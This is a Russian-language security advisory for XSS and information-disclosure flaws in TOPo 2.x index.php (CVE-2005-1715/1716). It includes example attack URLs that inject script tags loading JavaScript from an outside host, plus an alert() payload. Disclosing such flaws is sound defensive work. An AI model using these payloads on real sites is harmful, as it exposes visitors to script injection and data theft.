Межсайтовый скриптинг в TOPo
- Дата публикации:
- 23.05.2005
- Всего просмотров:
- 776
- Опасность:
- Средняя
- Наличие исправления:
- Нет
- Количество уязвимостей:
- 1
- CVSSv2 рейтинг:
- CVE ID:
-
CVE-2005-1715
CVE-2005-1716 - Вектор эксплуатации:
- Удаленная
- Воздействие:
-
Межсайтовый скриптинг
Раскрытие важных данных
Раскрытие системных данных - CWE ID:
- Нет данных
- Наличие эксплоита:
- Нет данных
- Уязвимые продукты:
- TOPo 2.x
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость существует в сценарии index.php при обработке входных данных в параметрах 'm', 's', 'ID', и 't'. Удаленный пользователю может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
http://[target]/topo/index.php?m=top">
<
SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
<
/script>&s=info&ID=1114815037.2498
http://[target]/topo/index.php?m=top&s=info&ID=1115946293.3552
"><
SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
<
/SCRIPT>&t=puntuar
http://[target] /topo/index.php?m=top&s=info">
<
script>alert()</script>&ID=1115946293.3552&t=puntuar
URL производителей: ej3soft.ej3.net/index.php?m=info&s=topo&t=info
Решение: Способов устранения уязвимости не существует в настоящее время.
Ссылки:
TOPo 2.2 multiple variable & fields XSS and information disclosure